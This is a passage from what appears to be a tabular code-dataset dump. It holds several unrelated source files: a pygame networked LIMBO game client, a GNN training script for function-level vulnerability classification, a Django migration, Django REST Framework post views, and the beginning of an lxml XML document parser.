seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
75264403945 | import socket
import pygame
# noinspection PyUnresolvedReferences,PyProtectedMember
from pygame._sdl2 import Window
from typing import Any
from _thread import start_new_thread
import winsound
from time import sleep
from json import loads, dumps, load
from pymsgbox import alert
class LimboKeysClient:
    """Networked client for the LIMBO keys mini-game.

    Connects to a local server and continuously mirrors the server-driven
    state (position, highlight, clickability, ...) into attributes read by
    the render loop, while reporting this client's quit/click intent back.
    """
    def __init__(self):
        self.id = -1 # 0-7 assigned by server, -1 if unknown
        self.position = [0, -300]  # window position, driven by the server
        self.id_surface = pygame.Surface((0, 0))  # rendered id label (debug overlay, blit is commented out below)
        self.wants_to_quit = False
        self.alive = True
        self.highlight_amount: float = 0  # 0..1 fade factor for the green key
        self.clicked = False
        self.clickable = False
        self.success = False
        # Background thread keeps the attributes above in sync with the server.
        start_new_thread(self.listening_thread, ())
    def listening_thread(self):
        """Blocking receive/send loop; runs on a worker thread for the life of the socket."""
        try:
            assigned_client_id = False
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect(("localhost", 6666))
                # Initial handshake so the server learns about this client.
                s.sendall(dumps({"quit": False, "clicked": False}).encode('ascii'))
                while True:
                    sleep(0.02)
                    # NOTE(review): assumes each recv(1024) yields exactly one
                    # complete JSON message — TCP does not guarantee framing; confirm.
                    msg: dict[str, Any] = loads(s.recv(1024).decode('ascii'))
                    self.id = msg["id"]
                    self.position = msg["position"]
                    self.alive = msg["alive"]
                    self.success = msg["success"]
                    self.clickable = msg["clickable"]
                    # Accumulate the server's highlight delta, clamped to [0, 1].
                    self.highlight_amount = min(1, max(self.highlight_amount + msg["highlight"] * 4 / FRAMERATE, 0))
                    if not assigned_client_id:
                        # One-time setup once the server has told us our id.
                        if self.id == 0:
                            # Only client 0 loads/plays the music.
                            pygame.mixer.music.load("LIMBO.mp3")
                            pygame.mixer.music.set_volume(0.3)
                            if music:
                                pygame.mixer.music.play()
                                pygame.mixer.music.set_pos(176)
                        self.id_surface = font.render(str(self.id), True, (0, 0, 0))
                        assigned_client_id = True
                    # Echo our intent back every tick.
                    s.sendall(dumps({"quit": self.wants_to_quit, "clicked": self.clicked}).encode('ascii'))
        except Exception as e:
            # Best effort: print the error and let the listener thread end.
            print(e)
WIDTH, HEIGHT, FRAMERATE = 150, 150, 75
# configurable defaults (overridden by config.json if present)
borderless = False
transparent = False
music = True
sfx = True
# ==============================
try:
    with open("config.json") as f:
        data: dict[str, Any] = load(f)
        borderless = data.get("borderless", False)
        transparent = data.get("transparent", False)
        music = data.get("music", True)
        sfx = data.get("sfx", True)
except FileNotFoundError:
    pass
pygame.init()
flags = 0
if borderless:
    flags |= pygame.NOFRAME
screen = pygame.display.set_mode([WIDTH, HEIGHT], flags=flags)
clock = pygame.time.Clock()
font = pygame.font.SysFont("Arial", 20)
key = pygame.image.load("key.png").convert_alpha()
green_key = pygame.image.load("green-key.png").convert_alpha()
pygame.display.set_caption("LIMBO")
client = LimboKeysClient()
pgwindow = Window.from_display_module()
if transparent:
    # Windows-only: make the fill color (1, 1, 1) fully transparent via a layered window.
    import win32api
    import win32con
    import win32gui
    # Create layered window
    hwnd = pygame.display.get_wm_info()["window"]
    win32gui.SetWindowLong(hwnd, win32con.GWL_EXSTYLE,
                           win32gui.GetWindowLong(hwnd, win32con.GWL_EXSTYLE) | win32con.WS_EX_LAYERED)
    # Set window transparency color
    win32gui.SetLayeredWindowAttributes(hwnd, win32api.RGB(*(1, 1, 1)), 0, win32con.LWA_COLORKEY)
running = True
# Main render loop; exits when the user quits or the server marks us dead.
while running and client.alive:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            client.wants_to_quit = True
            # Give the listener thread a tick to send the quit flag.
            sleep(0.1)
            running = False
        if event.type == pygame.MOUSEBUTTONDOWN:
            if event.button == 1:
                if client.clickable:
                    client.clicked = True
    screen.fill((1, 1, 1))
    if client.highlight_amount != 0:
        # Cross-fade from the normal key to the green key.
        screen.blit(green_key, green_key.get_rect(center=(WIDTH / 2, HEIGHT / 2)))
        key.set_alpha(255 - int(client.highlight_amount * 255))
        screen.blit(key, key.get_rect(center=(WIDTH / 2, HEIGHT / 2)))
    else:
        screen.blit(key, key.get_rect(center=(WIDTH / 2, HEIGHT / 2)))
    # screen.blit(client.id_surface, (10, 10))
    pgwindow.position = [int(pos) for pos in client.position]
    pygame.display.flip()
    clock.tick(FRAMERATE)
# End-of-game feedback, only if the user actually picked a key.
if client.clicked:
    if client.success:
        alert("You win")
    else:
        if sfx:
            start_new_thread(winsound.PlaySound, ("SystemExclamation", winsound.SND_ALIAS))
        alert("Wrong guess")
pygame.quit()
| quasar098/limbos32 | main.py | main.py | py | 4,638 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "pygame.Surface",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "_thread.start_new_thread",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "socket.socket",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET"... |
20006327119 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn.utils.rnn import pad_sequence
from torch.nn.utils.rnn import pack_padded_sequence
from torch.nn.utils.rnn import pad_packed_sequence
from gensim.models.word2vec import Word2Vec
import torch_geometric.nn as pyg_nn
import torch_geometric.utils as pyg_utils
import time
from datetime import datetime
import networkx as nx
# from torch_geometric.datasets import TUDataset
# from torch_geometric.datasets import Planetoid
from torch_geometric.data import DataLoader
from torch_geometric.data import Data
from torch_geometric.data import InMemoryDataset, Dataset, download_url
# import torch_geometric.transforms as T
from tensorboardX import SummaryWriter
# from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import pandas as pd
import os
import logging
from pathlib import Path
import json
import argparse
from sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score, confusion_matrix
try:
import cPickle as pickle
except:
import pickle
from model import GNNStack, GNNStack2, GNNStack3
from data_loader import MyLargeDataset
# import nni
# from nni.utils import merge_parameter
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
logger = None
# setting device on GPU if available, else CPU
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#Additional Info when using cuda
if device.type == 'cuda':
print('#', torch.cuda.get_device_name(0))
# print('# Memory Usage:')
# print('# Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
# print('# Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
def plot_dataset(dataset):
    """Draw the dataset's graph with networkx, coloring nodes by label."""
    edges_raw = dataset.data.edge_index.numpy()
    edges = [(x, y) for x, y in zip(edges_raw[0, :], edges_raw[1, :])]
    labels = dataset.data.y.numpy()
    G = nx.Graph()
    # NOTE(review): range(np.max(edges_raw)) stops one short of the highest
    # node index; add_edges_from re-creates it unless it is isolated — confirm intended.
    G.add_nodes_from(list(range(np.max(edges_raw))))
    G.add_edges_from(edges)
    plt.subplot(111)
    options = {
        'node_size': 30,
        'width': 0.2,
    }
    nx.draw(G, with_labels=False, node_color=labels.tolist(), cmap=plt.cm.tab10, font_weight='bold', **options)
    plt.show()
def myprint(s, is_log=0):
    """Echo ``s`` to stdout; additionally log it at INFO level when ``is_log`` > 0."""
    print(s)
    if is_log > 0:
        logger.info(s)
def test(loader, model, is_validation=False):
    """Evaluate ``model`` over every batch of ``loader``.

    Returns a dict with accuracy/recall/f1/precision plus the four raw
    confusion-matrix cells (tn, fp, fn, tp).
    """
    model.eval()
    correct = 0
    labels_seen = []
    preds_seen = []
    for batch in loader:
        with torch.no_grad():
            logits = model(batch)
            target = batch.y
            # Predicted class = argmax over the class dimension.
            _, top_class = torch.max(logits.data, 1)
            labels_seen.append(target.cpu())
            preds_seen.append(top_class.cpu())
            correct += top_class.eq(target).sum().item()
    total = len(loader.dataset)  # kept for parity with the accuracy bookkeeping above
    y_true = torch.cat(labels_seen)
    y_pred = torch.cat(preds_seen)
    tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
    return {
        "accuracy": accuracy_score(y_true, y_pred),
        "recall": recall_score(y_true, y_pred),
        "f1": f1_score(y_true, y_pred),
        "precision": precision_score(y_true, y_pred),
        "tn": tn,
        "fp": fp,
        "fn": fn,
        "tp": tp
    }
def print_result(phase, score, epoch = -1):
    """Print (and log) one header row plus one metrics row via ``myprint``."""
    header_cols = "Acc\tR\tP\tF1\tTN\tFP\tFN\tTP"
    values = (score['accuracy'], score['recall'], score['precision'], score['f1'],
              score['tn'], score['fp'], score['fn'], score['tp'])
    if phase in ('train', 'vali'):
        # Train/validation rows carry the epoch number.
        myprint("Epoch {}, {}:\t{}".format(epoch, phase, header_cols), 1)
        myprint("Epoch {}, {}:\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{}\t{}\t{}\t{}".format(epoch, phase, *values), 1)
    else:
        myprint("{}:\t{}".format(phase, header_cols), 1)
        myprint("{}:\t{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{}\t{}\t{}\t{}".format(phase, *values), 1)
def train(params, dataset, writer, plot=False, print_grad=False):
    """Train a GNN on ``dataset`` with an 80/10/10 train/vali/test split.

    Checkpoints the model whenever validation F1 improves, reloads the best
    checkpoint at the end, evaluates on the test split and returns the model.
    """
    data_size = len(dataset)
    print("data_size:", data_size)
    logger.info("data_size: {}".format(data_size) )
    # 80/10/10 split by index order.
    loader = DataLoader(dataset[:int(data_size * 0.8)], batch_size=params['batch_size'], shuffle=True)
    # loader = DataLoader(dataset[:800], batch_size=params['batch_size'], shuffle=True)
    vali_loader = DataLoader(dataset[int(data_size * 0.8): int(data_size * 0.9)], batch_size=params['batch_size'], shuffle=True)
    test_loader = DataLoader(dataset[int(data_size * 0.9):], batch_size=params['batch_size'], shuffle=True)
    # build model
    if params['model_type'] == 'GNNStack2':
        logger.info("loading model: GNNStack2")
        model = GNNStack2(params)
    elif params['model_type'] == 'GNNStack3':
        logger.info("loading model: GNNStack3")
        model = GNNStack3(params)
    else:
        logger.info("loading model: GNNStack")
        model = GNNStack(params)
    # gpu_tracker = MemTracker() # define a GPU tracker
    # gpu_tracker.track()
    # print(model)
    # exit()
    model.to(device)
    # gpu_tracker.track()
    # print("len(model.convs):", len(model.convs))
    opt = optim.Adam(model.parameters(), lr=params['learning_rate'], weight_decay=5e-4)
    # opt = optim.SGD(model.parameters(), lr=LEARNING_RATE, momentum=0.9)
    min_valid_loss = np.inf
    best_f1_score = -1
    best_model_path = ""
    train_accuracies, vali_accuracies = list(), list()
    # train
    for epoch in range(params['epoch']):
        logger.info("=== now epoch: %d" % epoch)
        total_loss = 0
        model.train()
        for batch in loader:
            # print(batch.train_mask, '----')
            opt.zero_grad() # clear accumulated gradients
            pred = model(batch)
            # pred = pred.argmax(dim=1, keepdim=True)
            # logger.info("pred: {}".format(pred))
            label = batch.y.to(device)
            # print("pred.shape : ",pred.shape)
            # print("label.shape: ",label.shape)
            loss = model.loss(pred, label)
            # gpu_tracker.track()
            loss.backward() # backpropagate; gradients accumulate onto existing ones
            opt.step() # apply the parameter update
            total_loss += loss.item() * batch.num_graphs
            # gpu_tracker.track()
            # delete caches
            del pred, loss
            # torch.cuda.empty_cache()
            # gpu_tracker.track()
        total_loss /= len(loader.dataset)
        writer.add_scalar("loss", total_loss, epoch)
        # validate
        train_score = test(loader, model)
        vali_score = test(vali_loader, model)
        train_accuracies.append(train_score['accuracy'])
        vali_accuracies.append(vali_score['accuracy'])
        if print_grad:
            # Dump every parameter tensor and its gradient (debugging aid).
            for i, para in enumerate(model.parameters()):
                print(f'{i + 1}th parameter tensor:', para.shape)
                print(para)
                print("grad:")
                print(para.grad)
        logger.info("Epoch: {}, loss: {:.6f}".format(epoch, total_loss))
        if total_loss < min_valid_loss:
            # Saving State Dict
            # torch.save(model.state_dict(), MODEL_SAVE_PATH + "/gcn_model_epoch%d.pth" % epoch)
            # best_model_path = MODEL_SAVE_PATH + "/gcn_model_epoch%d.pth" % epoch
            print("Training Loss Decreased: {:.6f} --> {:.6f}.".format(min_valid_loss, total_loss))
            logger.info("Training Loss Decreased: {:.6f} --> {:.6f}.".format(min_valid_loss, total_loss))
            min_valid_loss = total_loss
        if vali_score['f1'] > best_f1_score:
            # Checkpoint on validation-F1 improvement (model selection criterion).
            torch.save(model.state_dict(), params['model_save_path'] + "/gcn_model_epoch%d.pth" % epoch)
            best_model_path = params['model_save_path'] + "/gcn_model_epoch%d.pth" % epoch
            print("New best F1: {:.4f} --> {:.4f}. Saved model: {}".format(best_f1_score, vali_score['f1'], best_model_path))
            logger.info("New best F1: {:.4f} --> {:.4f}. Saved model: {}".format(best_f1_score, vali_score['f1'], best_model_path))
            best_f1_score = vali_score['f1']
        print_result("train", train_score, epoch)
        print_result("vali", vali_score, epoch)
        # exit()
        # report intermediate result
        # nni.report_intermediate_result(vali_score['accuracy'])
        # logger.info("w_pdt: {}, w_ref: {}, w_def: {}, w_lp: {}, w_ns: {}".format(model.w_pdt, model.w_ref, model.w_def, model.w_lp, model.w_ns))
        writer.add_scalar("test_accuracy", vali_score['accuracy'], epoch)
    # report final result
    # nni.report_final_result(vali_score['accuracy'])
    # Load
    # model = Net()
    if os.path.exists(best_model_path):
        myprint("loading the best model: %s" % best_model_path, 1)
        model.load_state_dict(torch.load(best_model_path))
    test_score = test(test_loader, model)
    print_result("test", test_score)
    if plot:
        plt.plot(train_accuracies, label="Train accuracy")
        plt.plot(vali_accuracies, label="Validation accuracy")
        plt.xlabel("# Epoch")
        plt.ylabel("Accuracy")
        plt.legend(loc='upper right')
        # plt.show()
        plt.savefig(params['model_save_path'] + "/gcn_model_accuracy.pdf")
    return model
def find_edges(func_key, relations_call, relations_callby, deleted, lv=0, call_type="all", nodes=None, edge_index=None, edge_weight=None):
    """Recursively collect a small call graph (depth |lv| < 2) around ``func_key``.

    Args:
        func_key: root function key for this expansion step.
        relations_call / relations_callby: {func_key: [callee/caller, ...]}.
        deleted: keys to skip entirely.
        lv: current depth (positive = call direction, negative = callby).
        call_type: 'all' at the root, then 'call' or 'callby' to keep
            expanding in one direction only.
        nodes / edge_index / edge_weight: accumulators threaded through the
            recursion; fresh ones are created when omitted.

    Returns:
        (nodes, edge_index, edge_weight) where edge_index holds
        [src_index, dst_index] pairs into ``nodes``.
    """
    # BUG FIX: the original defaults were mutable lists ([]), shared across
    # calls, so edge_index/edge_weight silently accumulated state between
    # independent invocations. Use None sentinels and allocate per call.
    if nodes is None:
        nodes = []
    if edge_index is None:
        edge_index = []
    if edge_weight is None:
        edge_weight = []
    if lv == 0:
        nodes = [func_key]
    func_index = nodes.index(func_key)
    # Expand both directions with the same weighting scheme: a repeated
    # relation to the same function bumps the edge weight by 0.1, capped
    # just above 1.5.
    for relations, direction, next_lv in ((relations_call, 'call', lv + 1),
                                          (relations_callby, 'callby', lv - 1)):
        if not (-2 < lv < 2):
            continue
        if func_key not in relations or call_type not in ('all', direction):
            continue
        weight = {}
        for sub_func in relations[func_key]:
            if sub_func in deleted:
                continue
            if sub_func not in weight:
                weight[sub_func] = 1
            elif weight[sub_func] < 1.5:
                weight[sub_func] += 0.1
        for sub_func, w in weight.items():
            if sub_func not in nodes:
                nodes.append(sub_func)
            edge_index.append([func_index, nodes.index(sub_func)])
            edge_weight.append(w)
            nodes, edge_index, edge_weight = find_edges(
                sub_func, relations_call, relations_callby, deleted,
                next_lv, direction, nodes, edge_index, edge_weight)
    return nodes, edge_index, edge_weight
def read_relation_file(relation_file, deleted):
    """Parse a single-JSON relation file and build a call graph per defined function.

    Args:
        relation_file: path to a JSON file mapping func_key -> list of
            {"type": "call"|"callby"|"define", "value": func_key} entries.
        deleted: func keys to exclude from relations and roots.

    Returns:
        dict mapping each level-0 ("define") function to
        {"nodes": [...], "edge_index": [...], "edge_weight": [...]}.
        Always a dict; empty when the file is missing or empty.
    """
    res = {}
    # read relations
    relations_call = {}
    relations_callby = {}
    if not os.path.exists(relation_file):
        return res
    with open(relation_file) as f:
        json_str = f.read().strip()
    if json_str == "":
        # BUG FIX: this path previously returned [] while every other path
        # returns a dict, breaking callers that iterate .items().
        return res
    obj = json.loads(json_str)
    lv0_functions = []
    for k, arr in obj.items():
        for v in arr:
            if v['type'] == 'call':
                if k in deleted or v['value'] in deleted:
                    continue
                relations_call.setdefault(k, []).append(v['value'])
            elif v['type'] == 'callby':
                if k in deleted or v['value'] in deleted:
                    continue
                relations_callby.setdefault(k, []).append(v['value'])
            elif v['type'] == 'define':
                # "define" entries mark the level-0 roots of the graphs.
                if v['value'] not in lv0_functions and v['value'] not in deleted:
                    lv0_functions.append(v['value'])
    print("len(lv0_functions):", len(lv0_functions))
    for func in lv0_functions:
        nodes, edge_index, edge_weight = find_edges(func, relations_call, relations_callby, deleted, 0, "all", [], [], [])
        res[func] = {
            "nodes": nodes,
            "edge_index": edge_index,
            "edge_weight": edge_weight
        }
    return res
def read_jh_relation_file(entities_file, relation_file, deleted):
    """Build per-function call graphs from a JSON-lines entities/relations pair.

    Level-0 vulnerable functions (level == 0 and vul == 1) from
    ``entities_file`` become graph roots; call/callby edges come from
    ``relation_file``.  Returns {func_key: {"nodes", "edge_index",
    "edge_weight"}}.
    """
    res = {}
    # read relations
    relations_call = {}
    relations_callby = {}
    json_str = ""
    if not os.path.exists(relation_file):
        return res
    lv0_functions = []
    with open(entities_file) as f:
        for line in f.readlines():
            l = line.strip()
            if l=="":
                continue
            obj = json.loads(l)
            # Only level-0 vulnerable functions are used as graph roots.
            if obj['level'] == 0 and obj['vul'] == 1:
                lv0_functions.append(obj['func_key'])
    with open(relation_file) as f:
        for line in f.readlines():
            l = line.strip()
            if l == "":
                continue
            obj = json.loads(l)
            for k, arr in obj.items():
                for v in arr:
                    # NOTE(review): unlike read_relation_file, entries in
                    # ``deleted`` are NOT filtered out here (find_edges still
                    # skips them during expansion) — confirm intended.
                    if v['type'] == 'call':
                        if k in relations_call.keys():
                            relations_call[k].append(v['value'])
                        else:
                            relations_call[k] = [v['value']]
                    elif v['type'] == 'callby':
                        if k in relations_callby.keys():
                            relations_callby[k].append(v['value'])
                        else:
                            relations_callby[k] = [v['value']]
    print("len(lv0_functions):", len(lv0_functions))
    logger.info("len(lv0_functions): {}".format(len(lv0_functions)))
    for func in lv0_functions:
        nodes = []
        edge_index = []
        edge_weight = []
        nodes, edge_index, edge_weight = find_edges(func, relations_call, relations_callby, deleted, 0, "all", [], [], [])
        res[func] = {
            "nodes": nodes,
            "edge_index": edge_index,
            "edge_weight": edge_weight
        }
    return res
def get_params():
    """Parse command-line paths and hyper-parameters for training.

    Uses ``parse_known_args`` so extra flags injected by external launchers
    (e.g. NNI) are ignored instead of raising.

    Returns:
        argparse.Namespace with all options.
    """
    parser = argparse.ArgumentParser(description='Test for argparse')
    parser.add_argument('--tasks_file', help='tasks_file', type=str, default='/data/function2vec3/tasks.json')
    parser.add_argument('--functions_path', help='functions_path', type=str,
                        default=BASE_DIR + "/data/function2vec3/functions_jy")
    parser.add_argument('--embedding_path', help='embedding_path', type=str, default='/data/function2vec4')
    parser.add_argument('--model_save_path', help='model_save_path', type=str, default='/data/automl_models')
    parser.add_argument('--best_model_path', help='best_model_path', type=str, default="")
    parser.add_argument('--model_type', help='model_type', type=str, default="GNNStack")
    parser.add_argument('--input_dim', help='input_dim', type=int, default=128)
    parser.add_argument('--output_dim', help='output_dim', type=int, default=2)
    parser.add_argument('--hidden_dim', help='hidden_dim', type=int, default=64)
    # BUG FIX: help text previously said 'hidden_dim' (copy-paste error).
    parser.add_argument('--batch_size', help='batch_size', type=int, default=16)
    parser.add_argument('--learning_rate', help='learning_rate', type=float, default=0.001)
    parser.add_argument('--epoch', help='epoch', type=int, default=100)
    parser.add_argument('--lp_path_num', help='lp_path_num', type=int, default=20)
    parser.add_argument('--lp_length', help='lp_length', type=int, default=60)
    parser.add_argument('--lp_dim', help='lp_dim', type=int, default=128)
    parser.add_argument('--lp_w2v_path', help='lp_w2v_path', type=str,
                        default=BASE_DIR + "/data/function2vec2/models/w2v_lp_combine.bin")
    parser.add_argument('--ns_length', help='ns_length', type=int, default=2000)
    parser.add_argument('--ns_dim', help='ns_dim', type=int, default=128)
    parser.add_argument('--ns_w2v_path', help='ns_w2v_path', type=str,
                        default=BASE_DIR + "/data/function2vec2/models/w2v_ns.bin")
    parser.add_argument('--log_msg', help='log_msg', type=str, default="Soft weights + CE-loss")
    args, _ = parser.parse_known_args()
    return args
if __name__ == '__main__':
    try:
        params = get_params()
        # get parameters from tuner
        # tuner_params = nni.get_next_parameter()
        # logger.debug(tuner_params)
        #params = vars(merge_parameter(params, tuner_params))
        params = vars(params)
        # logger.info("params: {}".format(params))
        # train
        # /xye_data_nobackup/wenbo/dlvp/data/function2vec4/automl_dataset_1v1/
        # Configure file logging; log name embeds timestamp and model type.
        now_time = time.strftime("%Y-%m-%d_%H-%M", time.localtime())
        log_file = "{}/../logs/{}_{}.log".format(BASE_DIR, now_time, params['model_type'])
        logging.basicConfig(level=logging.INFO,
                            format='%(asctime)s %(levelname)s %(filename)s line: %(lineno)s - %(message)s',
                            datefmt='%Y-%m-%d %H:%M:%S',
                            filename=log_file)
        logger = logging.getLogger(__name__)
        # Device
        print('# Using device:', device)
        logger.info("=== using device: %s" % str(device))
        dataset_savepath = params['embedding_path'] + "/automl_dataset_1v1"
        Path(dataset_savepath).mkdir(parents=True, exist_ok=True)
        Path(params['model_save_path']).mkdir(parents=True, exist_ok=True)
        dataset = MyLargeDataset(dataset_savepath, params)
        logger.info("=== Train ===")
        writer = SummaryWriter("./log/" + datetime.now().strftime("%Y%m%d-%H%M%S"))
        model = train(params, dataset, writer, plot=False, print_grad=False)
    except Exception as exception:
        # NOTE(review): if the failure happens before logging is configured,
        # ``logger`` is still None here and logger.exception raises
        # AttributeError, masking the original error — confirm.
        logger.exception(exception)
        raise
    logger.info("training GCN done.")
{
"api_name": "os.path.dirname",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "torch.device",
"line... |
19593309895 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Alter ``carga.id_carga`` to a 6-character CharField."""

    dependencies = [
        ('carga', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='carga',
            name='id_carga',
            field=models.CharField(max_length=6),
        ),
    ]
| wellicfaria/cargobr | carga/migrations/0002_auto_20150922_1258.py | 0002_auto_20150922_1258.py | py | 389 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.AlterField",
"line_number": 14,
"usage_type": "call"
},
{... |
30395658662 | from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from django.http import HttpResponse
from rest_framework.generics import ListAPIView
from django.db.models import Q
from posts.models import Post, PostCategory, PostOwner
from memberships.models import Plan, Member
from posts.api.serializers import PostApi, PostCategoryApi, PostOwnerApi
from rest_framework import filters
from django_filters.rest_framework import DjangoFilterBackend
@api_view(['GET',])
def api_posts_view(request):
    """List every post that is not disabled (post_status != 0)."""
    try:
        visible_posts = Post.objects.all().exclude(post_status=0)
    except Post.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        return Response(PostApi(visible_posts, many=True).data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_paid_view(request, uid):
    """Return the posts visible to user ``uid`` based on membership status.

    Active members see the posts of their plan plus free posts; everyone
    else only sees posts of the 'free' plan.
    """
    try:
        # BUG FIX: ``Q(a) and Q(b)`` / ``Q(a) or Q(b)`` use Python's boolean
        # operators, which simply evaluate to one of the two (truthy) Q
        # objects — the other condition was silently dropped. Composing Q
        # expressions requires the ``&`` and ``|`` operators.
        member = Member.objects.filter(Q(member_uid=uid) & Q(member_status=1)).order_by('member_since').first()  # latest active subscription (currently unused)
        is_member = Member.objects.filter(member_uid=uid).last()
        if is_member and is_member.member_status == 1:
            print('Ő member és aktív is')
            member_plan = is_member.member_plan.plan_slug  # current plan slug
            print(member_plan)
            # Member's plan posts OR free posts (deduplicated).
            posts = Post.objects.filter(Q(post_plan__plan_slug=member_plan) | Q(post_plan__plan_slug='free')).distinct()
            print(posts)
        else:
            print('Nem member vagy nem aktiv')
            posts = Post.objects.filter(post_plan__plan_slug='free')
            print('Ingyenes psoztok:', posts)
    except Member.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        serializer = PostApi(posts, many=True)
        return Response(serializer.data, status=status.HTTP_200_OK)
class BookmarkList(ListAPIView):
    """List the posts whose ids are passed as ``?ids=1,2,3``; all posts otherwise."""
    serializer_class = PostApi

    def get_queryset(self):
        # Comma-separated id list from the query string, if provided.
        raw_ids = self.request.query_params.get('ids', None)
        if raw_ids is None:
            # No filter given: return everything.
            return Post.objects.all()
        wanted = [int(part) for part in raw_ids.split(',')]
        # Restrict to the requested ids, hiding disabled posts.
        return Post.objects.filter(id__in=wanted).exclude(post_status=0)
@api_view(['GET',])
def api_post_details_view(request, pk):
    """Return one post by primary key, or 404 if it does not exist."""
    try:
        requested_post = Post.objects.get(pk=pk)
    except Post.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        return Response(PostApi(requested_post).data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_by_category_view(request, pk):
    """List the non-disabled posts belonging to category ``pk``."""
    try:
        category_posts = Post.objects.filter(post_category=pk).exclude(post_status=0)
    except Post.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        return Response(PostApi(category_posts, many=True).data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_by_owner_view(request, pk):
    """List the posts written by owner ``pk``."""
    try:
        owner_posts = Post.objects.filter(post_owner=pk)
    except Post.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        return Response(PostApi(owner_posts, many=True).data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_categories_view(request):
    """List every post category."""
    try:
        all_categories = PostCategory.objects.all()
    except PostCategory.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        return Response(PostCategoryApi(all_categories, many=True).data, status=status.HTTP_200_OK)
@api_view(['GET',])
def api_post_owners_view(request):
    """List every post owner."""
    try:
        owners = PostOwner.objects.all()
    # BUG FIX: the guard previously caught Post.DoesNotExist although the
    # query targets PostOwner; catch the exception of the model actually used.
    except PostOwner.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        serializer = PostOwnerApi(owners, many=True)
        return Response(serializer.data, status=status.HTTP_200_OK)
# TODO: remove this endpoint later
@api_view(['POST',])
def api_post_create_view(request):
    """Create a post from the request payload; validation errors yield 400."""
    if request.method == 'POST':
        serializer = PostApi(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
| siklerdaniiii/astral | posts/api/views.py | views.py | py | 5,074 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "posts.models.Post.objects.all",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "posts.models.Post.objects",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "posts.models.Post",
"line_number": 19,
"usage_type": "name"
},
{
"ap... |
37747156972 | from lxml import etree
import numpy as np
import re
class BhpDocumentParser:
    """Parse a BHP/BRO XML document (e.g. a CPT registration request) into a
    metadata dict plus numeric measurement matrices.
    """
    # Class-level defaults; real per-instance values are (re)assigned in __init__.
    isCPTRegistrationRequest = False
    nsMap = {}
    metadata = {}
    cptMatrix = None
    dissipationMatrices = None
    def __init__(self, xmlTree):
        self.xmlTree = xmlTree
        # BUG FIX: nsMap was a shared, mutable class attribute that
        # generateNsMap mutated in place, leaking namespaces between
        # parser instances. Give each instance its own dict.
        self.nsMap = {}
        self.generateNsMap()
        self.generateMatrix()
        self.metadata = BhpDocumentParser.lxml_to_dict(self.getRoot())
        self.determineIsCPT()
    def getRoot(self):
        """Return the root element, whether we hold a tree or an element."""
        if (hasattr(self.xmlTree, 'getroot')):
            return self.xmlTree.getroot()
        return self.xmlTree
    def determineIsCPT(self):
        """Set isCPTRegistrationRequest from the parsed metadata structure."""
        if ('registrationRequest' in self.metadata):
            if ('sourceDocument' in self.metadata['registrationRequest']):
                if ('CPT' in self.metadata['registrationRequest']['sourceDocument']):
                    self.isCPTRegistrationRequest = True
    def generateMatrix(self):
        """Extract the CPT values matrix and any dissipation-test matrices."""
        conePenetrationTest = self.getElementByTagName('conePenetrationTest')
        dissipationTests = self.getListOfElementsByTagName('dissipationTest')
        if(conePenetrationTest is not None):
            values = self.getChildElementByTagName(conePenetrationTest, 'values')
            self.cptMatrix = BhpDocumentParser.convertDataToMatrix(values.text, 25)
        if(dissipationTests is not None):
            dissMatrixList = list()
            for dissipationTest in dissipationTests:
                values = self.getChildElementByTagName(dissipationTest, 'values')
                matrix = BhpDocumentParser.convertDataToMatrix(values.text, 5)
                dissMatrixList.append(matrix)
            self.dissipationMatrices = dissMatrixList
        return None
    @staticmethod
    def convertDataToMatrix(data, rows):
        """Convert ';'-separated lines of ','-separated values into a float
